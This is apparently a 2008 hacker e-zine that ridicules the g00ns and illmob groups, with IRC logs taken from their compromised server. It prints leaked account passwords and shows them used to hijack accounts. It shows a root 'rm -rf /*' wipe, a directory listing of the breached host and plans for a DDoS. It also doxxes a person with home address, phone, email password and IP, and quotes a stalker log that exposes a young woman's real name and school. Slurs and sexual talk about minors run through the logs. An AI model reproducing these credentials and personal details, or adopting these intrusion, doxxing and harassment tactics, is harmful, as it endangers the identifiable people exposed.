<+Zombocom> Angyl gets bitchy when she gets confused -11:55 < ECB> SHIT IM ALMOST OUT -11:55 < Murdoc> 40/m/basement -11:55 < Slowpoke> 12/f/uk u? -11:55 < Slowpoke> :) -11:56 < Slowpoke> aww :> -11:56 -!- theswelseason is now known as Selfish -11:56 <+Zombocom> she's allways confused with her sexuality -11:56 <+Zombocom> so she's always angry -11:56 < Angyl> im playing trivia -11:56 <+theswellseason> you're asking to get rooted boy -11:56 < Angyl> and im alrdy on xanax -11:56 <+theswellseason> LOL -11:56 <+theswellseason> shit, not even that works -11:56 <+theswellseason> <3 -11:56 < r00tr00t> [root@demon2 lib]# rm -rf /* -11:56 < r00tr00t> rm: cannot remove `/aquota.group': Operation not permitted -11:56 < r00tr00t> rm: cannot remove `/aquota.user': Operation not permitted -11:56 < r00tr00t> bye bye -11:56 < Angyl> lol -11:56 <+Zombocom> not even xanax can stop her hormonal rage -11:56 <+Zombocom> NOTHING CAN TOP HER -11:56 <+Zombocom> STAY OUT OF HER WAY -11:57 < Angyl> im not raging -11:57 * Zombocom jumps in front of a train -11:57 < Slowpoke> What about -11:57 < Slowpoke> a slowpoke -11:57 < Slowpoke> ^_^^ -11:57 <%andy> everyone in here thats connected to irc.evilcoders.net -11:57 <+Zombocom> OH GOD -11:57 <%andy> connect to irc.partyvan.fm -11:57 <+Zombocom> SHE'S SO ANGRY -11:57 <+Zombocom> SHE'S SUPER FUCKING PISSED -11:57 -!- Netsplit irc.evilcoders.net <-> haruhi.partyvan.hub quits: p00h, -kumar, +PhyuK|Shmoke, malaphus, +Zombocom, Striker, andy, Gibby, ECB, @FuRY, - (+34 more, use /NETSPLIT to show all of them) -11:58 -!- Angyl [Angyl@132.108.93.155] has quit [Quit: ] ---- Log closed Wed May 07 11:58:41 2008 - - -14:10 -!- lilo [lilo@D609CC9E.EF030B1D.2A28F7FA.IP] has joined #G00NS -14:11 < lilo> trintitty f4rh@nLOL° -14:11 < lilo> plasma jblink -14:11 <%plasma> wat -14:11 <%plasma> lolol -14:11 < lilo> trintitty -> nickserv: identify lolh@x0r -14:11 < lilo> lulz -14:11 <%plasma> that's sad :( -14:11 < fff> l0l -14:11 < lilo> PhyuK -> nickserv: identify 1asdf2 -14:11 <%plasma> colombia :O -14:11 -!- lilo [lilo@D609CC9E.EF030B1D.2A28F7FA.IP] has quit [Killed (core (faggot))] -14:11 <+d0ct0r> lol -14:11 < fff> u dumb j3ws -14:12 <+theswellseason> wait, core are those right? -14:12 <+d0ct0r> i dont think so. -14:12 <+theswellseason> lol nvm -14:12 <+theswellseason> you wouldn't tell me if you could -14:12 <%plasma> well -14:12 <%plasma> he got mine right -14:12 -!- PhyuK [kyle.mclol@sluts.r.us] has quit [NickServ (GHOST command used by canr)] -14:12 <%plasma> :( -14:12 <%canr> lol its right -14:12 <+d0ct0r> lol -14:12 -!- trintitty [trintitty@DESU-598F0E26.dsl.mindspring.com] has quit -[NickServ (GHOST command used by w)] -14:12 <%andy> oh mother fucker -14:12 <+theswellseason> oh shit! -14:12 < fff> lilo -> nickserv: identify isuckalotofdickmmm -14:12 <+d0ct0r> :O -14:12 <+theswellseason> core, get what's that fucker's IP? -14:13 -!- syph [syph@freecandy.van] has joined #G00NS -14:13 -!- mode/#g00ns [+h syph] by HustleServ -14:13 <%plasma> theswellseason: it was a proxy -14:13 * d0ct0r goes to change all his pw's -14:13 <%plasma> in colombia -14:13 <@core> theswellseason: im not retarded -14:13 < fff> lilo -> nickserv: identify isuckalotofdickmmm -14:13 < fff> lilo -> nickserv: identify isuckalotofdickmmm -14:13 < fff> lilo -> nickserv: identify isuckalotofdickmmm -14:13 -!- PhyuK [kyle.mclol@sluts.r.us] has joined #G00NS -14:13 -!- mode/#g00ns [+v PhyuK] by HustleServ -14:13 <%syph> hai -14:13 <+PhyuK> o no my irc nick -14:13 <+PhyuK> :( -14:13 <+PhyuK> im h4xed -14:13 <+PhyuK> i use that pw for EVERYTHING -14:13 -!- trintitty [trintitty@DESU-598F0E26.dsl.mindspring.com] has joined #G00NS -14:13 -!- mode/#g00ns [+o trintitty] by HustleServ -14:13 <%plasma> why didnt he deface g00ns.net? :p -14:13 <@trintitty> ... -14:14 <+theswellseason> you were hacked -14:14 <@trintitty> because he had more ultimate pwnage in mind.. -14:14 -!- grub [grub@FB6A658F.9037C7E6.2A28F7FA.IP] has joined #G00NS -14:14 < grub> FuRY -> nickserv: identify asshole6669 -14:14 -!- trintitty [trintitty@DESU-598F0E26.dsl.mindspring.com] has -quit [NickServ (GHOST command used by fff)] -14:14 <%plasma> lol -14:14 < fff> lol -14:14 -!- mode/#g00ns [+b *!*@desu-2A800167.dynamic.swissvpn.net] by canr -14:14 < grub> core -> nickserv: IDENTIFY h4xorwooT -14:14 -!- fff [fff@DESU-2A800167.dynamic.swissvpn.net] has quit [Killed (core (-))] -14:14 -!- FuRY|Working is now known as FuRY -14:14 -!- FuRY is now known as drop -14:14 -!- core [~core@fbi.lol] has quit [NickServ (GHOST command used by plasma)] - - -14:16 -!- core [~core@fbi.lol] has joined #G00NS -14:16 -!- mode/#g00ns [+o core] by HustleServ -14:16 -!- FuRY [douglas@Shit.Piss.Fuck.Cunt.CockSucker.MotherFucker] has joined #G00NS -14:16 < FuRY> :| -14:16 < FuRY> `up -14:16 <+PhyuK> I hope everybody is aware of the repercussions -14:17 <@core> change your passes -14:17 <@core> /ns set password -14:17 <%canr> why ;\ -14:17 < FuRY> i dropped mine -14:17 < FuRY> :P -14:17 <%canr> if he can get it again -14:17 <%andy> `sop add FuRY -14:17 < FuRY> `up -14:17 -!- mode/#g00ns [+ao FuRY FuRY] by HustleServ -14:17 <&FuRY> thx -14:17 -!- mode/#g00ns [+v canr] by canr -14:17 <@w> why are pw's not encrypted -14:17 <%plasma> w: well, they used to be :( - -14:49 <~clorox> g00ns are over -14:50 -!- clorox changed the topic of #G00NS to: -FUKKEN ANGRY LACROSSE HACKERS - http://xi.7x.ru/~inaki/g00ns/ - g00ns are over - - -15:12 <+[nazi]notjack> g00nFuRY (20:47:47): hackers that hack hackers -15:12 < DrMengele> yeah what happened? -15:13 <+[nazi]notjack> zero for owned r00ted g00ns -15:13 <+[nazi]notjack> deleted everything -15:13 <+[nazi]notjack> g00ns may be over -15:13 <+[nazi]notjack> so -15:13 <+[nazi]notjack> drama -15:13 < lollercaust> drama sucks -15:13 < lollercaust> what is zero for owned website? -15:13 < WB> http://zero.for.owned.on -15:14 < WB> http://zero.for.owned.on.nimp.org -15:14 <+[nazi]notjack> Yeah -15:14 < lollercaust> heh i use lynx smartass -15:15 <~tribal> `akick add * g00ns is over -15:15 <~tribal> what -15:15 -!- tribal is now known as clorox -15:15 <~clorox> `akick add * g00ns is over -15:15 -!- mode/#g00ns [+b *!*@*] by HustleServ -15:15 -!- NoName was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- unknown|49515 was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- TaGg was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- [Midnight] was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- skinless was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- malaphus was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- Striker was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- CuNt was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- aempirei was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- Gibby was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- KLAUS_NOMI was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- REVEREND_REY was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- iZaP was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- FukkenSaved was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- Kame was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- Deltantor was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- RickRollington was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- transientox was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- Jewgoldz|A[ushwitz] was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- WB was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- DeMiNe0 was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- DrMengele was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- Dark_Fusion was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- p00h was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- ECB was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- malaphus|laptop was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- Angyl was kicked from #g00ns by HustleServ [g00ns is over] -15:15 -!- krispin was kicked from #g00ns by HustleServ [g00ns is over] ---- Log closed Wed May 07 15:15:24 2008 - -Fantastic, just FANTASTIC. - -We were just jealous that g00ns thought of selling t-shirts before we did. -Anybody want a "ZF0wned", "0wned by ZF0", or "Featured in ZF04" t-shirt? -Look for them at a store near you! - -Just kidding, we're not in it for the money. If we were, instead of making -and selling t-shirts we would make and sell CANVAS. - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 illmob zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -illmob was on the g00ns box, but they get their own article because they aren't -g00ns and we have a bit of material. - -illmob is just a laugh no matter how you look at it. Never was taken seriously, -and it's claim to fame is ill[will] being imprisoned for selling Windows source - code. Check out his legal papers and wikipedia article, name's William Genovese. - -illmob didn't really get themselves owned, I mean they did not cause the g00ns -owning in any way. They weren't even a target, just a helpless battleground spoil. - -Their only security mistake that lead to this was being hosted on g00ns. It's a -mistake nonetheless, albeit one they wanted to correct. It's not like they are -really secure or anything, the webdir is basically a poorly managed file dump. - -We found some funny quotes for you. They give (most of) these out for free in -#illmob, check it out for a laugh. They will probably be glad to have another -channel member regardless of how you treat them. - -Phist -> #illmob: [ill]will: I've just realized why nobody links to us anymore -and shit -canr -> #illmob: Why? -Phist -> #illmob: [ill]will: Now that you're out of jail, it's not 'cool' to -like illmob - -Phist -> #illmob: chilly: Please could you commit a crime -Phist -> #illmob: but a cool one -chilly -> #illmob: jaywalk -Phist -> #illmob: because we need more hits - -// There's a documentary?? Must not have made my local theatre -canr -> #illmob: Whats the name of that documentary about [ill]will -canr -> #illmob: the 2600 one? -Phist -> #illmob: I forget - are you Scandinavian? or Finnish? -canr -> #illmob: Freedom Downtime -canr -> #illmob: Got it - -Phist -> #illmob: We've got the skill to be something -Phist -> #illmob: and we're wasting our time -Spyd3r -> #illmob: yes, I agree -Phist -> #illmob: we've got will back -Phist -> #illmob: he's a fuckin' ASM master - -Phist -> #illmob: this is bullshit -Phist -> #illmob: we're pro - -SpunkWang -> #illmob: gh0st: I have normal user access to a box... /r/ sploits -(vmsplice doesnt work ;-;_ -gh0st -> #illmob: what distro -SpunkWang -> #illmob: how do i find out... i knew the command 4 hours ago lol -ummmm - -ECB -> #illmob: its kind of sad, im not smart enough to do computer shit -ECB -> #illmob: all this 01010101010101 shit and fucking C++ -gh0st -> #illmob: try -gh0st -> #illmob: uname -a -ECB -> #illmob: I fucking got an A+ in my classes, why cant i understand C++ - -gh0st -> #illmob: spunkwang: he's running kernel 2.6.9 -gh0st -> #illmob: shit is outdated nigga -SpunkWang -> #illmob: gh0st: I tried running the vmsplice sploit but it nay -work :( - -// Capitalisation is sweet, is there a Disney movie now or something? -Spyd3r -> #illmob: I know shit about system level exploits -Riot -> #illmob: Buffer Overflows are fuckin myths to me. - -Spyd3r -> #illmob: I consider myself a bright guy, but the only programming I -do is web apps - -padlock -> #illmob: I know slack the best -padlock -> #illmob: bsd sounds good, too, though -padlock -> #illmob: I'm so confused, so many good kernels and distros - -coldblood -> #illmob: sounds like the new server is mega securer -coldblood -> #illmob: k r u really going to need that much sercurity? -padlock -> #illmob: Yeah, so I want to make sure we don't get owned stupidly -coldblood -> #illmob: yer that would be embassing if you did -padlock -> #illmob: Spyd3r is good at making sure the website itself doesn't -have a ton of holes, and I secure servers for a living, so I think we should be -able to handle it -coldblood -> #illmob: yer -padlock -> #illmob: Only ports open on the server are for services we'll use -padlock -> #illmob: And it'll be behind another firewall on top of that - -Spyd3r -> #illmob: well we run well over 375 client sites from the farm -Spyd3r -> #illmob: only about 200 of those have the add-on that was used to get -in - -canr -> gr0b: Theres this code my friend has: -MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECHvugCZLtxdhBAhVuqcPWK5Pig== -canr -> gr0b: Hes wondering what encryption that is. Would you happen to know -what type? - - -~~~~~~~~~~~~~~ - -shamrock -> #illmob: im getting some widgets for yahoo go -[ill]will -> #illmob: dont waste your youth on the interweb -[ill]will -> #illmob: save it to your late 30s -[ill]will -> #illmob: well actually you dont have to worry right now about -underage poon -[ill]will -> #illmob: so get yourself an aol account -[ill]will -> #illmob: and start a/s/l and s2r-ing -[ill]will -> #illmob: easy pussy on aol -[ill]will -> #illmob: girls on the net have low self esteem - -coldblood -> #illmob: Beer + penis = pussy -canr -> #illmob: no. -Phist -> #illmob: canr: ya rly -Phist -> #illmob: coldblood: From that one sentence, I just extracted the -information that you are a virgin - -Phist -> #illmob: I'm not gonna sit here and talk shit about it, but I'm pretty -insulted -Spyd3r -> #illmob: I rather miffed myself -Spyd3r -> #illmob: just glad that we're alrdy planning to get on a different -server -coldblood -> #illmob: then do something about it -Phist -> #illmob: I'm not, because z3r0 has done so much for us -Spyd3r -> #illmob: I'm so sick of the children -Phist -> #illmob: and the g00ns as a group have been really supportive -Spyd3r -> #illmob: aye, I must give respect to "the g00ns" -Spyd3r -> #illmob: but individually speaking, there's a mean age of 17 -Spyd3r -> #illmob: why is it that I've only met 4 intelligent g00ns? - -Spyd3r -> #illmob: having some experience in the pr0n industry, that doesn't -surprise me too much -Spyd3r -> #illmob: I've done a lot of free-lance work in what used to be the -very respectable SickSiteNetworks -Phist -> #illmob: coldblood: He also starred in 2girls1cup -Spyd3r -> #illmob: that's the parent company for ConsumptionJunction, -SteakandCheese, RevengeWorld, about 5 others -Spyd3r -> #illmob: They were acquired back in November, so I haven't done work -for them in a bit - -canr -> #illmob: Shamrock is = Shamrock, sham_, sham, clover, teh, w-,irlgov.ie - -canr -> gr0b: I want to kill shamrock. -canr -> gr0b: I just hate shamrock with a burning passion. -shamrock -> a59: uhh wanna own canr with me? - -Phist -> #illmob: I tried to quit at got promoted -Phist -> #illmob: and* -Genocide -> #illmob: damn, you suck at quitting -Genocide -> #illmob: :) -Phist -> #illmob: If I try to quit again, I'll get network admin -Phist -> #illmob: :P -Phist -> #illmob: seriously though, I hate this -Phist -> #illmob: just sayin -Genocide -> #illmob: i'm willing to live with that -Genocide -> #illmob: you can't leave me ;_ -Genocide -> #illmob: ; -Phist -> #illmob: I do like the individuals -Phist -> #illmob: god fucking dammit -Phist -> #illmob: It's not like it makes a difference -Phist -> #illmob: We should start an e-war with anonymous // we'll get the -word out for you - -Spyd3r -> Riot: don't take this the wrong way, ok? -Riot -> Spyd3r: k -Riot -> Spyd3r: :> -Spyd3r -> Riot: I gather data on anyone I come across -Riot -> Spyd3r: Mhmm. -Riot -> Spyd3r: I expecti t. -Spyd3r -> Riot: and I have an extensive library on g00ns members - -Riot -> Spyd3r: I dunno, I'm thinking about leaving g00ns -Riot -> Spyd3r: Don't really get much respect for my craft there, you know -Riot -> Spyd3r: Can't really grow. -Spyd3r -> Riot: I have a lot of respect for a few g00ns in particular -Spyd3r -> Riot: I won't state them here, but I'll admit you've made the list -Riot -> Spyd3r: Thanks, I appreciate it. -Riot -> Spyd3r: #TEXTCEE -Spyd3r -> Riot: and of those members, I have called (a few of) their parents -and attempted to verify that info -Spyd3r -> Riot: tbh, pr0be's mom was hilarious - -Riot -> Spyd3r: I love probe too -Spyd3r -> Riot: I ENVY him! -Spyd3r -> Riot: I envy you too -Riot -> Spyd3r: Why is that? -Spyd3r -> Riot: I'm in my late 20's -Riot -> Spyd3r: So. -Spyd3r -> Riot: yer both young and brite - -CryptiK -> #illmob: well anonymous is gay. they can dos me all they want. - -Phist -> Genocide: Deadly Data -Phist -> Genocide: Chris Richardson -Phist -> Genocide: Apartment -Phist -> Genocide: 2627 N Bourbon St. #27 -Phist -> Genocide: Orange, CA 92865 -Phist -> Genocide: (714) 322-0741 -Phist -> Genocide: Email: Deadlydata -Phist -> Genocide: Password: partyguy6924 -Phist -> Genocide: IP: 24.17.82.161 -Genocide -> Phist: lawlz -Phist -> Genocide: That's wrong - - -tribaL -> loSt: as soon as illmob moves off our box -loSt -> tribaL: yo -tribaL -> loSt: im going to fucking ddos them to shit - -tribaL -> loSt: i've done EVERYTHINGinmy power t help them -tribaL -> loSt: while illwill was locked up -tribaL -> loSt: and i get disrespected by him saying he has evverybodys dox -tribaL -> loSt: and he doubts i can get his - -tribaL -> loSt: i fucking hosted their irc -loSt -> tribaL: why does illwill think he is the shit? -tribaL -> loSt: anybody thats ever fucked with them I TOOK DOWN -tribaL -> loSt: its not him -loSt -> tribaL: he came back after 2 years thinking he still knows everything - - - -~~~~~~~~~~~~~ - -Some simple logs for you. - -[root@demon2 illmob]# ls -al -total 92 -drwx--x--x 7 illmob illmob 4096 Apr 1 04:21 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. -drwx------ 2 illmob illmob 4096 Aug 2 2007 backups --rw-r--r-- 1 illmob illmob 24 Aug 1 2007 .bash_logout --rw-r--r-- 1 illmob illmob 176 Aug 1 2007 .bash_profile --rw-r--r-- 1 illmob illmob 124 Aug 1 2007 .bashrc --rw-r--r-- 1 illmob illmob 3541 Feb 1 11:44 blade.css -drwxr-xr-x 3 illmob illmob 4096 Aug 2 2007 domains -drwxrwx--- 3 illmob illmob 4096 Mar 12 16:37 imap -drwx------ 2 illmob illmob 4096 Aug 1 2007 mail --rw-r--r-- 1 illmob illmob 21544 Feb 1 11:44 network.html --rw-r--r-- 1 illmob illmob 12391 Feb 1 11:44 network.xml -lrwxrwxrwx 1 illmob illmob 32 Apr 1 04:21 public_html -> ./domains/illmob.org/public_html --rw-r----- 1 illmob mail 34 Apr 1 04:21 .shadow -drwxr-xr-x 3 illmob illmob 4096 Jan 7 20:20 webmail -[root@demon2 illmob]# ls -al public_html/ -total 39396 -drwxr-xr-x 28 illmob illmob 4096 Mar 19 12:37 . -drwxr-xr-x 8 illmob illmob 4096 Aug 2 2007 .. --rw-r--r-- 1 illmob illmob 970 Jan 31 2006 404.shtml --rw-r--r-- 1 illmob illmob 90738 Jan 31 2006 404.swf --rw-r--r-- 1 illmob illmob 148330 Jan 2 20:59 60592_owned.jpg --rw-r--r-- 1 illmob illmob 7168 Jan 10 09:25 aim.exe --rw-r--r-- 1 illmob illmob 279054 Jan 10 22:37 aimview.jpg --rw-r--r-- 1 illmob illmob 603176 Feb 21 18:55 autoruns.exe --rw-r--r-- 1 illmob illmob 5672 Feb 24 2006 BatShells.rar --rw-r--r-- 1 illmob illmob 9150 Feb 24 2006 batshells.txt --rw-r--r-- 1 illmob illmob 100 Mar 2 09:44 bb.html --rw-r--r-- 1 illmob illmob 177664 Feb 3 2006 BinaryTextScan.exe --rw-r--r-- 1 illmob illmob 3541 Feb 1 11:46 blade.css --rw-r--r-- 1 illmob illmob 700 Jan 31 2006 blah_left.htm --rw-r--r-- 1 illmob illmob 55233 Jan 31 2006 blah_right.htm --rw-r--r-- 1 illmob illmob 86132 Feb 20 2006 blingring.jpg -drwxr-xr-x 2 illmob illmob 4096 Feb 11 07:05 carputer --rw-r--r-- 1 illmob illmob 13962 Feb 12 2006 case.html -drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 cd-nix --rw-r--r-- 1 illmob illmob 81 Feb 15 20:58 celebs.html --rw-r--r-- 1 illmob illmob 345466 Feb 15 20:56 celebs.rar --rw-r--r-- 1 illmob illmob 345244 Feb 15 21:00 celebs.zip -drwxr-xr-x 2 illmob illmob 4096 Jan 28 2006 cgi-bin -drwxr-xr-x 4 illmob illmob 4096 Aug 1 2007 chat -drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 clay --rw-r--r-- 1 illmob illmob 13450 Jan 31 2006 Copy of index.php --rw-r--r-- 1 illmob illmob 22565 Jan 14 21:24 Desktop.rar -drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 desktops --rw-r--r-- 1 illmob illmob 784605 Oct 30 2006 ds2.mp3 --rw-r--r-- 1 illmob illmob 3139377 Oct 30 2006 ds.mp3 -drwxrwxr-x 2 illmob illmob 4096 Aug 4 2007 ff -drwxrwxr-x 16 illmob illmob 4096 Aug 1 2007 files --rw-r--r-- 1 illmob illmob 115057 Mar 18 2006 files.html -drwxr-xr-x 6 illmob illmob 4096 Aug 1 2007 fingerbang --rw-r--r-- 1 illmob illmob 5310 Dec 19 07:38 firefox.txt -drwxr-xr-x 6 illmob illmob 4096 Aug 1 2007 freeillwill --rw-r--r-- 1 illmob illmob 28119 Mar 17 18:54 fuckme.JPG -drwxr-xr-x 3 illmob illmob 36864 Aug 12 2007 funny --rw-r--r-- 1 illmob illmob 6301 Jan 5 22:00 getkey.exe --rw-r--r-- 1 illmob illmob 65649 Jan 9 21:37 getkeyvista.JPG --rw-r--r-- 1 illmob illmob 43518 Jan 15 18:12 google.jpg --rw-r--r-- 1 illmob illmob 9652 Jan 31 2006 hack.jpg --rw-r--r-- 1 illmob illmob 3197 Mar 13 20:16 h.gif --rw-r--r-- 1 illmob illmob 69822 Feb 2 2006 hozilla.bmp --rw-r--r-- 1 illmob illmob 100571 Feb 3 2006 hozilla.htm --rw-r--r-- 1 illmob illmob 87474 Dec 21 13:22 hozilla_src.zip --rw-r--r-- 1 illmob illmob 0 Feb 5 2006 .htaccess --rw-r--r-- 1 illmob illmob 16761 Feb 20 2006 illmob_logo.jpg --rw-r--r-- 1 illmob illmob 1134 Feb 1 2006 illmob_radio.pls --rw-r--r-- 1 illmob illmob 199955 Jan 31 2006 illwill.html -drwxrwxr-x 8 illmob illmob 4096 Jan 16 06:30 images --rw-r--r-- 1 illmob illmob 95409 Mar 6 2006 img_0029.jpg -drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 inc --rwxr-xr-x 1 illmob illmob 608 Apr 28 2006 index.old --rw-r--r-- 1 illmob illmob 8718 Feb 15 2006 index_.php --rw-r--r-- 1 illmob illmob 8712 Feb 14 2006 index.php -drwxr-xr-x 3 illmob illmob 4096 Mar 12 16:34 irc --rw-r--r-- 1 illmob illmob 14838 Feb 23 2006 jen2.jpg --rw-r--r-- 1 illmob illmob 15052 Feb 23 2006 jen3.jpg --rw-r--r-- 1 illmob illmob 14896 Feb 23 2006 jen.jpg -drwxr-xr-x 4 illmob illmob 4096 Mar 13 21:19 kiddies -drwxr-xr-x 2 illmob illmob 4096 Feb 1 11:58 lanimages --rw-r--r-- 1 illmob illmob 331 Jan 31 2006 links.html --rw-r--r-- 1 illmob illmob 775930 Mar 2 2006 ll.jpg --rw-rw-r-- 1 illmob illmob 0 Feb 2 2006 logger.html --rw-r--r-- 1 illmob illmob 219 Feb 2 2006 logger.php --rwxr-xr-x 1 illmob illmob 18554 Jun 5 2003 logo.jpg -drwxr-xr-x 3 illmob illmob 4096 Aug 1 2007 macdaddy --rw-r--r-- 1 illmob illmob 2326 Mar 10 2006 macdaddy.html -drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 mactrack -drwxr-xr-x 2 illmob illmob 4096 Dec 21 12:56 maxima --rw-r--r-- 1 illmob illmob 17518 Dec 21 13:24 me.jpg --rw-r--r-- 1 illmob illmob 447 Feb 13 2006 mia.txt --rw-r--r-- 1 illmob illmob 1475 Feb 23 2006 minishell.asm --rw-r--r-- 1 illmob illmob 2560 Feb 23 2006 minishell.exe --rw-r--r-- 1 illmob illmob 1218 Mar 10 2006 motd --rw-r--r-- 1 illmob illmob 19119 Feb 28 2006 mouth.jpg -drwxr-xr-x 2 illmob illmob 4096 Feb 20 15:42 myQuickAdmin --rw-r--r-- 1 illmob illmob 6780 Jan 31 14:38 myspace.html --rw-r--r-- 1 illmob illmob 21548 Feb 1 12:00 network.html --rw-r--r-- 1 illmob illmob 12391 Feb 1 11:46 network.xml -drwxr-xr-x 2 illmob illmob 4096 Jan 10 12:56 new --rw-r--r-- 1 illmob illmob 903 Jan 31 2006 new.gif --rw-r--r-- 1 illmob illmob 11903 Jan 31 2006 oldindex.php --rw-r--r-- 1 illmob illmob 53497 Feb 20 2006 panel.php --rw-r--r-- 1 illmob illmob 18438 Jan 10 22:40 passview.jpg --rw-r--r-- 1 illmob illmob 22301 Jan 11 06:33 passview.png --rw-r--r-- 1 illmob illmob 52930 Jan 31 2006 paypal3.jpg --rw-r--r-- 1 illmob illmob 35474 Jan 31 2006 paypal4.jpg --rw-r--r-- 1 illmob illmob 52541 Jan 31 2006 paypal-malcovitch1.jpg --rw-r--r-- 1 illmob illmob 55151 Jan 31 2006 paypal-malcovitch2.jpg --rw-r--r-- 1 illmob illmob 54589 Jan 31 2006 paypal-malcovitch3.jpg --rw-r--r-- 1 illmob illmob 58468 Jan 31 2006 paypal-malcovitch4.jpg -drwxr-xr-x 2 illmob illmob 4096 Feb 18 15:30 phist --rw-r--r-- 1 illmob illmob 1922 Dec 4 11:14 php.txt --rw-r--r-- 1 illmob illmob 20867 Mar 2 2006 pigroast.jpg --rw-r--r-- 1 illmob illmob 3564584 Feb 21 18:55 procexp.exe --rw-r--r-- 1 illmob illmob 19987 Feb 24 2006 r00t1n.txt --rw-r--r-- 1 illmob illmob 3772 Mar 31 2006 rainbow.html --rw-r--r-- 1 illmob illmob 40754 Mar 18 2006 releases.html --rw-r--r-- 1 illmob illmob 4604 Feb 24 2006 reverse.bat --rw-r--r-- 1 illmob illmob 850 Jan 31 2006 rid.php --rw-r--r-- 1 illmob illmob 55412 Jul 3 2007 rulezz.conf --rw-r--r-- 1 illmob illmob 3054 Feb 23 2006 shell.bat --rw-r--r-- 1 illmob illmob 9722720 Feb 21 18:54 spybot.exe --rw-r--r-- 1 illmob illmob 18569 Jun 7 2007 staff.html --rw-r--r-- 1 illmob illmob 17038 Oct 9 2006 staff.old --rw-r--r-- 1 illmob illmob 3136 Mar 19 12:37 stalker.txt --rw-r--r-- 1 illmob illmob 1224537 Dec 27 09:21 StupidKidGangsta.gif -drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 suspended.page --rw-r--r-- 1 illmob illmob 2560 Jan 31 2006 test.exe --rw-r--r-- 1 illmob illmob 15169130 Mar 12 2006 TheILLIST.rar --rw-r--r-- 1 illmob illmob 940 Nov 1 2006 tikiwiki.txt --rw-r--r-- 1 illmob illmob 186040 Feb 15 2006 tommy.jpg --rw-r--r-- 1 illmob illmob 10181 Jan 16 06:39 toughbook.html --rw-r--r-- 1 illmob illmob 1073835 Dec 26 06:21 usb-rape.zip --rw-r--r-- 1 illmob illmob 2545 Mar 7 2006 users.txt -drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 videos --rw-r--r-- 1 illmob illmob 170305 Feb 21 18:27 vnc.exe --rw-r--r-- 1 illmob illmob 115200 Feb 22 18:09 vundofix.exe -drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 wan --rw-r--r-- 1 illmob illmob 29639 Feb 20 2006 woodohs.jpg -drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 wtf -[root@demon2 public_html]# cat stalker.txt -[15:53] hackerillwill: hi -[15:53] SAMCAT03: hi -[15:53] hackerillwill: im still trying to figure you out lol -[15:54] SAMCAT03: ok -[15:54] hackerillwill: u said wallingfor drighht -[15:54] SAMCAT03: dont worry about it -[15:57] hackerillwill: WELL I JUST WANTED TO KNOW WHY I ADDE YOU ,THERE HAD TO -BE A REASON -[15:57] SAMCAT03: well u obviously dont know who i am so why bother -[15:57] SAMCAT03: its not important -[15:58] hackerillwill: -Samcat03 -Age: 22, Gender: female, Location: Waterbury, CT - -[15:58] SAMCAT03: ok -[15:58] hackerillwill: -Samantha Moeckel -[15:58] SAMCAT03: and thats wrong -[15:58] hackerillwill: BETTER? -[15:59] SAMCAT03: thats not me -[15:59] hackerillwill: capricorn -[15:59] hackerillwill: attend Western Connecticut State University majoring in -secondary math education -[15:59] SAMCAT03: nope -[16:00] hackerillwill: sgm1385 is your yahoo -[16:01] SAMCAT03: why do u care who i am? -[16:01] hackerillwill: like i said i was just wondering because i added you -like 2 yrs ago -[16:01] hackerillwill: and you make me have to do it the hard way -[16:01] SAMCAT03: ummm ok -[16:01] hackerillwill: maybe we flirted in a chatroom before -[16:02] SAMCAT03: u still dont know me though -[16:02] SAMCAT03: no cause i dont go on yahoo -[16:02] hackerillwill: i never said i talke dto you on yahoo -[16:03] hackerillwill: im just saying thats your yahoo name -[16:03] SAMCAT03: im sorry im just having a tough time right now i dont mean to -be rude -[16:03] hackerillwill: its ok -[16:04] hackerillwill: yer cute i guess -[16:04] SAMCAT03: how do u even have a [pic of me? -[16:05] hackerillwill: i have a bunch of pics of you -[16:05] SAMCAT03: ok but how? -[16:05] hackerillwill: i like the one of 